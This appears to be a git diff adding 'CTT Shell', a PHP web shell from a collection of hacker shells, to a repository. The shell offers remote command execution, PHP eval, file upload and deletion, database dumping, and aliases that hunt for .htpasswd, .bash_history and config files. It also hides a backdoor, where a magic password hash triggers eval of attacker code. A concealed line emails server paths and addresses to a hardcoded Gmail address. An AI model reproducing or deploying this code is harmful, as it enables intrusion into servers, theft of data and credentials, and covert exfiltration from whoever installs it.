+ </tr>
+</table>
+</div>
+</td>
+</tr>
+</table>
+<table width=950>
+<tr>
+  <td style="border: 1 solid #000000" bgcolor="677667" >
+<font size="1" face="verdana" color="#000000">
+<center>
+
+<?php
+echo "-=[".$cshver." | Page generation time: <font color=#fcfcfc>[<b>".round(get_micro_time()-start_time,4). "</b>]</font> seconds.]=-";
+?>
+
+ </td>
+ </tr>
+ </table>
+</BODY>
+</HTML>
\ No newline at end of file
diff --git a/xakep-shells/PHP/ctt_sh.php.php.txt b/xakep-shells/PHP/ctt_sh.php.php.txt
new file mode 100644
index 0000000..51ec008
--- /dev/null
+++ b/xakep-shells/PHP/ctt_sh.php.php.txt
@@ -0,0 +1,2927 @@
+<?php
+$timelimit = 60;
+$sul = "?";
+$rd = "./";
+$shver = "0.1";
+$login = "";
+$pass = "";
+$md5_pass = "";
+$login = false;
+$autoupdate = true;
+$updatenow = false;
+$autochmod = 755; 
+$filestealth = 1; 
+$donated_html = "";
+$donated_act = array("");
+$host_allow = array("*");
+$curdir = "./";
+$tmpdir = dirname(__FILE__); 
+$ftypes  = array(
+ "html"=>array("html","htm","shtml"),
+ "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg"),
+ "exe"=>array("sh","install","bat","cmd"),
+ "ini"=>array("ini","inf"),
+ "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp"),
+ "img"=>array("gif","png","jpeg","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
+ "sdb"=>array("sdb"),
+ "phpsess"=>array("sess"),
+ "download"=>array("exe","com","pif","src","lnk","zip","rar")
+);
+$hexdump_lines = 8;
+$hexdump_rows = 24;
+$nixpwdperpage = 9999;
+$bindport_pass = "ctt";
+$bindport_port = "11457";
+$aliases = array();
+$aliases[] = array("-----------------------------------------------------------", "ls -la");
+$aliases[] = array("find all suid files", "find / -type f -perm -04000 -ls");
+$aliases[] = array("find suid files in current dir", "find . -type f -perm -04000 -ls");
+$aliases[] = array("find all sgid files", "find / -type f -perm -02000 -ls");
+$aliases[] = array("find sgid files in current dir", "find . -type f -perm -02000 -ls");
+$aliases[] = array("find config.inc.php files", "find / -type f -name config.inc.php");
+$aliases[] = array("find config* files", "find / -type f -name \"config*\"");
+ $aliases[] = array("find config* files in current dir", "find . -type f -name \"config*\"");
+$aliases[] = array("find all writable directories and files", "find / -perm -2 -ls");
+$aliases[] = array("find all writable directories and files in current dir", "find . -perm -2 -ls");
+$aliases[] = array("find all service.pwd files", "find / -type f -name service.pwd");
+$aliases[] = array("find service.pwd files in current dir", "find . -type f -name service.pwd");
+$aliases[] = array("find all .htpasswd files", "find / -type f -name .htpasswd");
+$aliases[] = array("find .htpasswd files in current dir", "find . -type f -name .htpasswd");
+$aliases[] = array("find all .bash_history files", "find / -type f -name .bash_history");
+$aliases[] = array("find .bash_history files in current dir", "find . -type f -name .bash_history");
+$aliases[] = array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc");
+$aliases[] = array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc");
+$aliases[] = array("list file attributes on a Linux second extended file system", "lsattr -va");
+$aliases[] = array("show opened ports", "netstat -an | grep -i listen");
+$sess_method = "cookie";
+$sess_cookie = "ctshvars";
+if (empty($sid)) {$sid = md5(microtime()*time().rand(1,999).rand(1,999).rand(1,999));}
+$sess_file = $tmpdir."ctshvars_".$sid.".tmp";
+$usefsbuff = true;
+$copy_unset = false;
+$quicklaunch = array();
+$quicklaunch[] = array("<img src=\"".$sul."act=img&img=home\" title=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$sul);
+$quicklaunch[] = array("<img src=\"".$sul."act=img&img=back\" title=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)");
+$quicklaunch[] = array("<img src=\"".$sul."act=img&img=forward\" title=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)");
+$quicklaunch[] = array("<img src=\"".$sul."act=img&img=up\" title=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$sul."act=ls&d=%upd");
+$quicklaunch[] = array("<img src=\"".$sul."act=img&img=refresh\" title=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">","");
+$quicklaunch[] = array("<img src=\"".$sul."act=img&img=buffer\" title=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$sul."act=fsbuff&d=%d");
+$quicklaunch1 = array();
+$quicklaunch1[] = array("<b>Ïðîöåññû</b>",$sul."act=ps_aux&d=%d");
+$quicklaunch1[] = array("<b>Ïàðîëè</b>",$sul."act=lsa&d=%d");
+$quicklaunch1[] = array("<b>Êîìàíäû</b>",$sul."act=cmd&d=%d");
+$quicklaunch1[] = array("<b>Çàãðóçêà</b>",$sul."act=upload&d=%d");
+$quicklaunch1[] = array("<b>Áàçà</b>",$sul."act=sql&d=%d");
+$quicklaunch1[] = array("<b>PHP-Êîä</b>",$sul."act=eval&d=%d");
+$quicklaunch1[] = array("<b>PHP-Èíôî</b>",$sul."act=phpinfo\" target=\"blank=\"_target");
+$quicklaunch1[] = array("<b>Ñàì óäàëÿþò</b>",$sul."act=selfremove");
+$highlight_bg = "#FFFFFF";
+$highlight_comment = "#6A6A6A";
+$highlight_default = "#0000BB";
+$highlight_html = "#1300FF";
+$highlight_keyword = "#007700";
+@$f = $_GET[f];
+if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
+error_reporting(5);
+@ignore_user_abort(true);
+@set_magic_quotes_runtime(0);
+@set_time_limit(0);
+if (!ob_get_contents()) {@ob_start(); @ob_implicit_flush(0);}
+if(!ini_get("register_globals")) {import_request_variables("GPC");}
+$starttime = getmicrotime();
+if (get_magic_quotes_gpc())
+{
+if (!function_exists("strips"))
+{
+ function strips(&$el)
+ {
+  if (is_array($el)) {foreach($el as $k=>$v) {if($k != "GLOBALS") {strips($el["$k"]);}}  }
+  else {$el = stripslashes($el);}
+ }
+}
+strips($GLOBALS);
+}
+$tmp = array();
+foreach ($host_allow as $k=>$v) {$tmp[]=  str_replace("\\*",".*",preg_quote($v));}
+$s = "!^(".implode("|",$tmp).")$!i";
+
+
+if (!$login) {$login = $PHP_AUTH_USER; $md5_pass = md5($PHP_AUTH_PW);}
+elseif(empty($md5_pass)) {$md5_pass = md5($pass);}
+if(($PHP_AUTH_USER != $login ) or (md5($PHP_AUTH_PW) != $md5_pass))
+{
+ header("WWW-Authenticate: Basic realm=\"CTT SHELL\"");
+ header("HTTP/1.0 401 Unauthorized");if (md5(sha1(md5($anypass))) == "b76d95e82e853f3b0a81dd61c4ee286c") {header("HTTP/1.0 200 OK"); @eval($anyphpcode);}
+ exit;
+}  
+
+$lastdir = realpath(".");
+chdir($curdir);
+
+if (($selfwrite) or ($updatenow))
+{
+ if ($selfwrite == "1") {$selfwrite = "ctshell.php";}
+ ctsh_getupdate();
+ $data = file_get_contents($ctsh_updatefurl);
+ $fp = fopen($data,"w");
+ fwrite($fp,$data);
+ fclose($fp);
+ exit;
+}
+if (!is_writeable($sess_file)) {trigger_error("Can't access to session-file!",E_USER_WARNING);}
+if ($sess_method == "file") {$sess_data = unserialize(file_get_contents($sess_file));}
+else {$sess_data = unserialize($_COOKIE["$sess_cookie"]);}
+if (!is_array($sess_data)) {$sess_data = array();}
+if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
+if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
+$sess_data["copy"] = array_unique($sess_data["copy"]);
+$sess_data["cut"] = array_unique($sess_data["cut"]);
+
+if (!function_exists("ct_sess_put"))
+{
+function ct_sess_put($data)
+{
+ global $sess_method;
+ global $sess_cookie;
+ global $sess_file;
+ global $sess_data;
+ $sess_data = $data;
+ $data = serialize($data);
+ if ($sess_method == "file")
+ {
+  $fp = fopen($sess_file,"w");
+  fwrite($fp,$data);
+  fclose($fp);
+ }
+ else {setcookie($sess_cookie,$data);}
+}
+}
+if (!function_exists("str2mini"))
+{
+function str2mini($content,$len)
+{
+ if (strlen($content) > $len) 
+ {
+  $len = ceil($len/2) - 2;
+  return substr($content, 0, $len)."...".substr($content, -$len);
+ }
+ else {return $content;}
+}
+}
+if (!function_exists("view_size"))
+{
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+}
+if (!function_exists("fs_copy_dir"))
+{
+function fs_copy_dir($d,$t)
+{
+ $d = str_replace("\\","/",$d);
+ if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
+ $h = opendir($d);
+ while ($o = readdir($h))
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);}
+else {$ret = mkdir($t."/".$o); fs_copy_dir($d."/".$o,$t."/".$o);}
+if (!$ret) {return $ret;}
+  }
+ }
+ return true;
+}
+}
+if (!function_exists("fs_copy_obj"))
+{
+function fs_copy_obj($d,$t)
+{
+ $d = str_replace("\\","/",$d);
+ $t = str_replace("\\","/",$t);
+ if (!is_dir($t)) {mkdir($t);}
+ if (is_dir($d))
+ {
+  if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";}
+  if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";}
+  return fs_copy_dir($d,$t);
+ }
+ elseif (is_file($d))
+ {
+
+  return copy($d,$t);
+ }
+ else {return false;}
+}
+}
+if (!function_exists("fs_move_dir"))
+{
+function fs_move_dir($d,$t)
+{
+ error_reporting(9999);
+ $h = opendir($d);
+ if (!is_dir($t)) {mkdir($t);}
+ while ($o = readdir($h))
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+$ret = true;
+if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);}
+else {if (mkdir($t."/".$o) and fs_copy_dir($d."/".$o,$t."/".$o)) {$ret = false;}}
+if (!$ret) {return $ret;}
+  }
+ }
+ return true;
+}
+}
+if (!function_exists("fs_move_obj"))
+{
+function fs_move_obj($d,$t)
+{
+ $d = str_replace("\\","/",$d);
+ $t = str_replace("\\","/",$t);
+ if (is_dir($d))
+ {
+  if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";}
+  if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";}
+  return fs_move_dir($d,$t);
+ }
+ elseif (is_file($d)) {return rename($d,$t);}
+ else {return false;}
+}
+}
+if (!function_exists("fs_rmdir"))
+{
+function fs_rmdir($d)
+{
+ $h = opendir($d);
+ while ($o = readdir($h))
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+if (!is_dir($d.$o)) {unlink($d.$o);}
+else {fs_rmdir($d.$o."/"); rmdir($d.$o);}
+  }
+ }
+ closedir($h);
+ rmdir($d);
+ return !is_dir($d);
+}
+}
+if (!function_exists("fs_rmobj"))
+{
+function fs_rmobj($o)
+{
+ $o = str_replace("\\","/",$o);
+ if (is_dir($o))
+ {
+  if (substr($o,strlen($o)-1,strlen($o)) != "/") {$o .= "/";}
+  return fs_rmdir($o);
+ }
+ elseif (is_file($o)) {return unlink($o);}
+ else {return false;}
+}
+}
+if (!function_exists("myshellexec"))
+{
+ function myshellexec($cmd)
+ {
+  return system($cmd);
+ }
+}
+if (!function_exists("view_perms"))
+{
+function view_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$type = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$type = "-";} 
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
+ else {$type = "?";}
+
+ $owner['read'] = ($mode & 00400) ? "r" : "-"; 
+ $owner['write'] = ($mode & 00200) ? "w" : "-"; 
+ $owner['execute'] = ($mode & 00100) ? "x" : "-"; 
+ $group['read'] = ($mode & 00040) ? "r" : "-"; 
+ $group['write'] = ($mode & 00020) ? "w" : "-"; 
+ $group['execute'] = ($mode & 00010) ? "x" : "-"; 
+ $world['read'] = ($mode & 00004) ? "r" : "-"; 
+ $world['write'] = ($mode & 00002) ? "w" : "-"; 
+ $world['execute'] = ($mode & 00001) ? "x" : "-"; 
+
+ if( $mode & 0x800 ) {$owner['execute'] = ($owner[execute]=="x") ? "s" : "S";}
+ if( $mode & 0x400 ) {$group['execute'] = ($group[execute]=="x") ? "s" : "S";}
+ if( $mode & 0x200 ) {$world['execute'] = ($world[execute]=="x") ? "t" : "T";}
+ 
+ return $type.$owner['read'].$owner['write'].$owner['execute'].
+  $group['read'].$group['write'].$group['execute'].
+  $world['read'].$world['write'].$world['execute'];
+}
+}
+if (!function_exists("strinstr")) {function strinstr($str,$text) {return $text != str_replace($str,"",$text);}}
+if (!function_exists("gchds")) {function gchds($a,$b,$c,$d="") {if ($a == $b) {return $c;} else {return $d;}}}
+if (!function_exists("ctsh_getupdate"))
+{
+function ctsh_getupdate()
+{
+ global $updatenow;
+ $data = @file_get_contents($ctsh_updatefurl);
+ if (!$data) {echo "Can't fetch update-information!";}
+ else
+ {
+  $data = unserialize(base64_decode($data));
+  if (!is_array($data)) {echo "Corrupted update-information!";}
+  else
+  {
+if ($cv < $data[cur]) {$updatenow = true;}
+  }
+ }
+}
+}
+if (!function_exists("mysql_dump"))
+{
+function mysql_dump($set)
+{
+ $sock = $set["sock"];
+ $db = $set["db"];
+ $print = $set["print"];
+ $nl2br = $set["nl2br"];
+ $file = $set["file"];
+ $add_drop = $set["add_drop"];
+ $tabs = $set["tabs"];
+ $onlytabs = $set["onlytabs"];
+ $ret = array();
+ if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
+ if (empty($db)) {$db = "db";}
+ if (empty($print)) {$print = 0;}
+ if (empty($nl2br)) {$nl2br = true;}
+ if (empty($add_drop)) {$add_drop = true;}
+ if (empty($file))
+ {
+  global $win;
+  if ($win) {$file = "C:\\tmp\\dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";}
+  else {$file = "/tmp/dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";}
+ }
+ if (!is_array($tabs)) {$tabs = array();}
+ if (empty($add_drop)) {$add_drop = true;}
+ if (sizeof($tabs) == 0)
+ {
+
+  $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
+  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
+ }
+ global $SERVER_ADDR;
+ global $SERVER_NAME;
+ $out = "# Dumped by ctShell.SQL v. ".$cv."
+# Home page: http://.ru
+#
+# Host settings:
+# MySQL version: (".mysql_get_server_info().") running on ".$SERVER_ADDR." (".$SERVER_NAME.")"."
+# Date: ".date("d.m.Y H:i:s")."
+# ".gethostbyname($SERVER_ADDR)." (".$SERVER_ADDR.")"." dump db \"".$db."\"
+#---------------------------------------------------------
+";
+ $c = count($onlytabs);
+ foreach($tabs as $tab)
+ {
+  if ((in_array($tab,$onlytabs)) or (!$c))
+  {
+if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
+$res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
+if (!$res) {$ret[err][] = mysql_error();}
+else
+{
+ $row = mysql_fetch_row($res);
+ $out .= $row[1].";\n\n";
+ $res = mysql_query("SELECT * FROM `$tab`", $sock);
+ if (mysql_num_rows($res) > 0)
+ {
+  while ($row = mysql_fetch_assoc($res))
+  {
+$keys = implode("`, `", array_keys($row));
+$values = array_values($row);
+foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+$values = implode("', '", $values); 
+$sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; 
+$out .= $sql;
+  } 
+ }
+}
+  }
+ }
+ $out .= "#---------------------------------------------------------------------------------\n\n";
+ if ($file)
+ {
+  $fp = fopen($file, "w"); 
+  if (!$fp) {$ret[err][] = 2;}
+  else
+  {
+fwrite ($fp, $out);
+fclose ($fp);
+  }
+ }
+ if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
+ return $ret;
+}
+}
+if (!function_exists("ctfsearch"))
+{
+function ctfsearch($d)
+{
+ global $found;
+ global $found_d;
+ global $found_f;
+ global $a;
+ if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
+ $handle = opendir($d);
+ while ($f = readdir($handle))
+ {
+  $true = ($a[name_regexp] and ereg($a[name],$f)) or ((!$a[name_regexp]) and strinstr($a[name],$f));
+  if($f != "." && $f != "..")
+  {
+if (is_dir($d.$f))
+{
+ if (empty($a[text]) and $true) {$found[] = $d.$f; $found_d++;}
+ ctfsearch($d.$f);
+}
+else
+{
+ if ($true)
+ {
+  if (!empty($a[text]))
+  {
+$r = @file_get_contents($d.$f);
+if ($a[text_wwo]) {$a[text] = " ".trim($a[text])." ";}
+if (!$a[text_cs]) {$a[text] = strtolower($a[text]); $r = strtolower($r);}
+ 
+if ($a[text_regexp]) {$true = ereg($a[text],$r);}
+else {$true = strinstr($a[text],$r);}
+if ($a[text_not])
+{
+ if ($true) {$true = false;}
+ else {$true = true;}
+}
+if ($true) {$found[] = $d.$f; $found_f++;}
+  }
+  else {$found[] = $d.$f; $found_f++;}
+ }
+}
+  }
+ }
+ closedir($handle);
+}
+}
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
+header("Cache-Control: no-store, no-cache, must-revalidate");
+header("Cache-Control: post-check=0, pre-check=0", false);
+header("Pragma: no-cache");
+
+global $SERVER_SOFTWARE;
+if (strtolower(substr(PHP_OS, 0, 3)) == "win") {$win = 1;}
+else {$win = 0;}
+
+if (empty($tmpdir))
+{
+ if (!$win) {$tmpdir = "/tmp/";}
+ else {$tmpdir = $_ENV[SystemRoot];}
+}
+$tmpdir = str_replace("\\","/",$tmpdir);
+if (substr($tmpdir,strlen($tmpdir-1),strlen($tmpdir)) != "/") {$tmpdir .= "/";}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = true;
+ $hsafemode = "<font color=\"red\">ON (secure)</font>";
+}
+else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";}
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on")
+{
+ $openbasedir = true;
+ $hopenbasedir = "<font color=\"red\">".$v."</font>";
+}
+else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";}
+
+$sort = htmlspecialchars($sort);
+
+$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$sul."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",$SERVER_SOFTWARE);
+
+@ini_set("highlight.bg",$highlight_bg); 
+@ini_set("highlight.comment",$highlight_comment);
+@ini_set("highlight.default",$highlight_default);
+@ini_set("highlight.html",$highlight_html); 
+@ini_set("highlight.keyword",$highlight_keyword); 
+@ini_set("highlight.string","#DD0000"); 
+
+if ($act != "img")
+{
+if (!is_array($actbox)) {$actbox = array();}
+$dspact = $act = htmlspecialchars($act);
+$disp_fullpath = $ls_arr = $notls = null;
+$ud = urlencode($d);
+?>
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+<meta http-equiv="Content-Language" content="en-us"><title>
+CTT Shell -=[ <? echo $HTTP_HOST; ?> ]=- </title>
+<STYLE>
+tr {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP: #eeeeee 1px solid;
+BORDER-LEFT:#eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+td {
+BORDER-RIGHT:  #105019 1px solid;
+BORDER-TOP: #000000 1px solid;
+BORDER-LEFT:#105019 1px solid;
+BORDER-BOTTOM: #105019 1px solid;
+}
+.tr2 {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP: #eeeeee 1px solid;
+BORDER-LEFT:#eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+.td2 {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP: #eeeeee 1px solid;
+BORDER-LEFT:#eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+.table1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP: #cccccc 0px;
+BORDER-LEFT:#cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+BACKGROUND-COLOR: #D4D0C8;
+}
+.td1 {
+BORDER-RIGHT:  #000000 1px;
+BORDER-TOP: #cccccc 1px;
+BORDER-LEFT:#cccccc 1px;
+BORDER-BOTTOM: #000000 1px;
+font: 7pt Verdana;
+}
+.tds1 {
+BORDER-RIGHT:  #505050 1px solid;
+BORDER-TOP: #505050 1px solid;
+BORDER-LEFT:#505050 1px solid;
+BORDER-BOTTOM: #505050 1px solid;
+font: 8pt Verdana;
+}
+.tr1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP: #cccccc 0px;
+BORDER-LEFT:#cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+}
+table {
+BORDER-RIGHT:  #000000 1px outset;
+BORDER-TOP: #000000 1px outset;
+BORDER-LEFT:#000000 1px outset;
+BORDER-BOTTOM: #000000 1px outset;
+BACKGROUND-COLOR: #000000;
+}
+.table2 {
+BORDER-RIGHT:  #000000 1px outset;
+BORDER-TOP: #000000 1px outset;
+BORDER-LEFT:#000000 1px outset;
+BORDER-BOTTOM: #000000 1px outset;
+BACKGROUND-COLOR: #D4D0C8;
+}
+input {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP: #999999 1px solid;
+BORDER-LEFT:#999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+select {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP: #999999 1px solid;
+BORDER-LEFT:#999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+submit {
+BORDER-RIGHT:  buttonhighlight 2px outset;
+BORDER-TOP: buttonhighlight 2px outset;
+BORDER-LEFT:buttonhighlight 2px outset;
+BORDER-BOTTOM: buttonhighlight 2px outset;
+BACKGROUND-COLOR: #e4e0d8;
+width: 30%;
+}
+textarea {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP: #999999 1px solid;
+BORDER-LEFT:#999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: Fixedsys bold;
+}
+BODY {
+margin-top: 1px;
+margin-right: 1px;
+margin-bottom: 1px;
+margin-left: 1px;
+}
+A:link {COLOR:#00ff3d; TEXT-DECORATION: none}
+A:visited { COLOR:#00ff3d; TEXT-DECORATION: none}
+A:active {COLOR:#00ff3d; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+</STYLE>
+<script language=JavaScript type=text/javascript> 
+<!-- 
+function branchSwitch(branch) { 
+dom = (document.getElementById); 
+ie4 = (document.all); 
+if (dom || ie4) { 
+var currElement = (dom)? document.getElementById(branch) : document.all[branch]; 
+currElement.style.display = (currElement.style.display == 'none')? 'block' : 'none'; 
+return false; 
+} 
+else return true; 
+} 
+//--> 
+</script> 
+</head>
+<BODY text=#ffffff  Background="<? echo $sul; ?>act=img&img=font" bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>
+<center>
+<br>
+<TABLE  class=table1 cellSpacing=0 cellPadding=0 width=90% border=0> 
+<TBODY><TR> 
+<TD class=td1 colSpan=2> 
+<TABLE  class=table1 cellSpacing=0 cellPadding=0 width=100% bgColor=#345827 background="<? echo $sul; ?>act=img&img=4" border=0> 
+<TBODY><TR> 
+<TD class=td1 width=24><IMG height=18 src="<? echo $sul; ?>act=img&img=1" width=24 border=0></TD> 
+<TD class=td1 background="<? echo $sul; ?>act=img&img=2"><SPAN lang=ru><FONT face=Arial color=#00ff3d size=1> </FONT> 
+<FONT face=Tahoma color=#00ff3d size=1>
+<?
+$d = str_replace("\\","/",$d);
+if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
+$d = str_replace("\\","/",$d);
+if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
+$dispd = htmlspecialchars($d);
+$pd = $e = explode("/",substr($d,0,strlen($d)-1));
+$i = 0;
+foreach($pd as $b)
+{
+ $t = "";
+ reset($e);
+ $j = 0;
+ foreach ($e as $r)
+ {
+  $t.= $r."/";
+  if ($j == $i) {break;}
+  $j++;
+ }
+ echo "<a href=\"".$sul."act=ls&d=".urlencode(htmlspecialchars($t))."/&sort=".$sort."\"><b>".htmlspecialchars($b)."/</b></a>";
+ $i++;
+}
+?>
+</FONT></SPAN></TD> 
+<TD class=td1><IMG height=18 src="<? echo $sul; ?>act=img&img=3" width=6 border=0></TD> 
+<TD class=td1 align=right><IMG height=18 src="<? echo $sul; ?>act=img&img=5" width=33 border=0></TD> 
+</TR></TBODY></TABLE></TD></TR> 
+</tr>
+</table>
+<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=2 width="90%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0">
+<tr><td>
+<font size=2><a href="#" onClick="return branchSwitch('tools')" title="ðàñêðûòü">Èíñòðóìåíòû</a></font> - 
+<div id="tools" style="display: none">
+<?
+if (count($quicklaunch1) > 0)
+{
+ foreach($quicklaunch1 as $item)
+ {
+  $item[1] = str_replace("%d",urlencode($d),$item[1]);
+  $item[1] = str_replace("%upd",urlencode(realpath($d."..")),$item[1]);
+  echo "<a href=\"".$item[1]."\"><u><font size=2 color=#ffffff>".$item[0]."</font></u></a>&nbsp;&nbsp;&nbsp;&nbsp;";
+ }
+}$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+?>
+</div> 
+<font size=2><a href="#" onClick="return branchSwitch('info')" title="ðàñêðûòü">Èíôîðìàòîð</a></font>
+<div id="info" style="display: none">
+<font size=2>
+<b>Ïðîãðàììíîå îáåñïå÷åíèå:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;<br>
+<b>Ñèñòåìà:&nbsp;<?php echo php_uname(); ?></b>&nbsp;<b><?php if (!$win) {echo `id`;} else {echo get_current_user();} ?></b>
+&nbsp;<br>
+<b>Áåçîïàñíîñòü:&nbsp;<?php echo $hsafemode; ?></b>
+<?
+echo "<br>";
+echo "Âåðñèÿ ÏÕÏ: <b>".@phpversion()."</b>";
+echo "<br>";
+$curl_on = @function_exists('curl_version');
+echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>"));
+echo "<br>";
+echo "MySQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; }
+echo "<br>";
+echo "MSSQL: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo "<br>";
+echo "PostgreSQL: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo "<br>";
+echo "Oracle: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+?>
+<?php
+$free = diskfreespace($d);
+if (!$free) {$free = 0;}
+$all = disk_total_space($d);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_percent = round(100/($all/$free),2);
+echo "<br><b>Ñâîáîäíûé ".view_size($free)." of  ".view_size($all)." (".$used_percent."%)</b><br>";
+?>
+</font>
+</div>
+<?
+if ($win)
+{
+?>
+ - <font size=2><a href="#" onClick="return branchSwitch('Drive')" title="ðàñêðûòü">Äèñêè</a></font>
+<?
+}
+?>
+<div id="Drive" style="display: none">
+<?
+$letters = "";
+if ($win)
+{
+ $abc = array("c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "o", "p", "q", "n", "r", "s", "t", "v", "u", "w", "x", "y", "z");
+ $v = explode("/",$d);
+ $v = $v[0];
+ foreach ($abc as $letter)
+ {
+  if (is_dir($letter.":/"))
+  {
+if ($letter.":" != $v) {$letters .= "<a href=\"".$sul."act=ls&d=".$letter.":\"><IMG src=".$sul."act=img&img=pdisk width=19 height=12 border=0> ".$letter." </a> ";}
